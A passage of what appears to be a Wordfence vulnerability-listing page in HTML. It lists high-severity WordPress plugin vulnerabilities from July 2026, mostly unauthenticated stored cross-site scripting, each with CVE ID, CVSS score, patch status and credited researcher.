<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a106ebb-f3ec-4995-9717-358b91d468b4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03542812-b6e5-421d-9ba6-43f1c779940f" target="_blank" rel="noopener">GTM4WP &lt;= 1.22.3 &#8211; Unauthenticated Stored Cross-Site Scripting via WooCommerce Billing Fields</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16597" target="_blank" rel="noopener noreferrer">							CVE-2026-16597						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duracelltomi-google-tag-manager" target="_blank" rel="noopener">GTM4WP – A Google Tag Manager (GTM) plugin for WordPress</a> <span class="wfvr-software-slug">[duracelltomi-google-tag-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03542812-b6e5-421d-9ba6-43f1c779940f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1c16bcb-c188-4e01-9d0b-e4e1a1ef82ee" target="_blank" rel="noopener">HBook &lt;= 2.1.9 &#8211; Unauthenticated Stored Cross-Site Scripting via Multiple Parameters</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8143" target="_blank" rel="noopener noreferrer">							CVE-2026-8143						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hbook-2" target="_blank" rel="noopener">HBook &#8211; Hotel booking system &#8211; WordPress Plugin</a> <span class="wfvr-software-slug">[hbook]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64a0165f9a088bbcf2fc9efe7719419b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64a0165f9a088bbcf2fc9efe7719419b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener">bashu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1c16bcb-c188-4e01-9d0b-e4e1a1ef82ee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/106fd83b-2ab0-4fcf-8c73-ba18ba9dbe56" target="_blank" rel="noopener">Kali Forms &lt;= 2.4.18 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65446" target="_blank" rel="noopener noreferrer">							CVE-2026-65446						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder</a> <span class="wfvr-software-slug">[kali-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/106fd83b-2ab0-4fcf-8c73-ba18ba9dbe56" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d2425e-69e5-4efe-bbc6-0ef121e74341" target="_blank" rel="noopener">MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder &lt;= 4.3.3 &#8211; Unauthenticated Stored Cross-Site Scripting via Form Field Values</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15052" target="_blank" rel="noopener noreferrer">							CVE-2026-15052						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-subscribe-sm" target="_blank" rel="noopener">MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder</a> <span class="wfvr-software-slug">[mailchimp-subscribe-sm]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/makka-pakka" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/340785ad53a1d99fd1554ac3f88bf112.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="340785ad53a1d99fd1554ac3f88bf112"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/makka-pakka" target="_blank" rel="noopener">she11f</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d2425e-69e5-4efe-bbc6-0ef121e74341" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3604b314-6b85-4d11-aa71-63f9198dbbdb" target="_blank" rel="noopener">Message Filter for Contact Form 7 &lt;= 1.6.3.9 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65438" target="_blank" rel="noopener noreferrer">							CVE-2026-65438						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-message-filter" target="_blank" rel="noopener">Message Filter for Contact Form 7</a> <span class="wfvr-software-slug">[cf7-message-filter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3604b314-6b85-4d11-aa71-63f9198dbbdb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b0e83af-5abd-4b6e-b606-850c03b05036" target="_blank" rel="noopener">Meta for WooCommerce &lt;= 3.7.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66707" target="_blank" rel="noopener noreferrer">							CVE-2026-66707						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/facebook-for-woocommerce" target="_blank" rel="noopener">Meta for WooCommerce</a> <span class="wfvr-software-slug">[facebook-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b0e83af-5abd-4b6e-b606-850c03b05036" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0c12678-1d91-4916-aa11-20292d9e384b" target="_blank" rel="noopener">Meta pixel for WordPress &lt;= 5.2.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66705" target="_blank" rel="noopener noreferrer">							CVE-2026-66705						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/official-facebook-pixel" target="_blank" rel="noopener">Meta pixel for WordPress</a> <span class="wfvr-software-slug">[official-facebook-pixel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0c12678-1d91-4916-aa11-20292d9e384b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2013b9ac-7853-40b9-8bef-7207ccd58eb1" target="_blank" rel="noopener">miniorange otp verification &lt;= 5.5.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61957" target="_blank" rel="noopener noreferrer">							CVE-2026-61957						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-otp-verification" target="_blank" rel="noopener">miniOrange OTP Login, Verification and SMS Notifications</a> <span class="wfvr-software-slug">[miniorange-otp-verification]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarcisio-luchesipoystick" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2e52c2cb2bdde3798dc1a0ad0bab7470.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2e52c2cb2bdde3798dc1a0ad0bab7470"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarcisio-luchesipoystick" target="_blank" rel="noopener">Tarcísio Luchesi(Poystick)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2013b9ac-7853-40b9-8bef-7207ccd58eb1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90c4441e-3578-4bb0-befe-cfedcb5c1a71" target="_blank" rel="noopener">Rank Math SEO – AI SEO Tools to Dominate SEO Rankings &lt;= 1.0.274.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66702" target="_blank" rel="noopener noreferrer">							CVE-2026-66702						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-by-rank-math" target="_blank" rel="noopener">Rank Math SEO – AI SEO Tools to Dominate SEO Rankings</a> <span class="wfvr-software-slug">[seo-by-rank-math]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90c4441e-3578-4bb0-befe-cfedcb5c1a71" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f432f32c-9ebb-4444-baf0-d523b1ceba02" target="_blank" rel="noopener">Simple Link Directory Pro &lt;= 15.0.6 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61953" target="_blank" rel="noopener noreferrer">							CVE-2026-61953						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-link-directory-pro" target="_blank" rel="noopener">Simple Link Directory Pro &#8211; AI Powered</a> <span class="wfvr-software-slug">[simple-link-directory-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f432f32c-9ebb-4444-baf0-d523b1ceba02" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/879df622-ca6a-45ea-b8f9-e3882d4bfff7" target="_blank" rel="noopener">Simply Schedule Appointments &lt;= 1.6.12.10 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65513" target="_blank" rel="noopener noreferrer">							CVE-2026-65513						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-schedule-appointments" target="_blank" rel="noopener">Simply Schedule Appointments</a> <span class="wfvr-software-slug">[simply-schedule-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitebyte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/59130a0d7d2c05091f16f97f2632ad64.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="59130a0d7d2c05091f16f97f2632ad64"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitebyte" target="_blank" rel="noopener">whitebyte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/879df622-ca6a-45ea-b8f9-e3882d4bfff7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15e90f19-e4cb-4096-8192-85d4f1f5ec24" target="_blank" rel="noopener">Social Share, Social Login and Social Comments Plugin – Super Socializer &lt;= 7.14.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65544" target="_blank" rel="noopener noreferrer">							CVE-2026-65544						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-socializer" target="_blank" rel="noopener">Social Share, Social Login and Social Comments Plugin – Super Socializer</a> <span class="wfvr-software-slug">[super-socializer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lqc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/028356566add2ba7dc84bb512e36fc3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="028356566add2ba7dc84bb512e36fc3e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lqc" target="_blank" rel="noopener">lqc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15e90f19-e4cb-4096-8192-85d4f1f5ec24" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/222079a2-20f1-4d53-8420-46ccc50988a8" target="_blank" rel="noopener">Spam protection, AntiSpam, FireWall by CleanTalk &lt;= 6.82 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65437" target="_blank" rel="noopener noreferrer">							CVE-2026-65437						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect" target="_blank" rel="noopener">Spam protection, Honeypot, Anti-Spam by CleanTalk</a> <span class="wfvr-software-slug">[cleantalk-spam-protect]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/222079a2-20f1-4d53-8420-46ccc50988a8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/79d4d776-411e-45ec-aff7-23453e686bf2" target="_blank" rel="noopener">StoreGrowth: Smart Sales Booster for WooCommerce | BOGO, Upsells, Direct Checkout, Quick View, Side Cart &lt;= 2.1.0 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;message_popup&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13440" target="_blank" rel="noopener noreferrer">							CVE-2026-13440						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
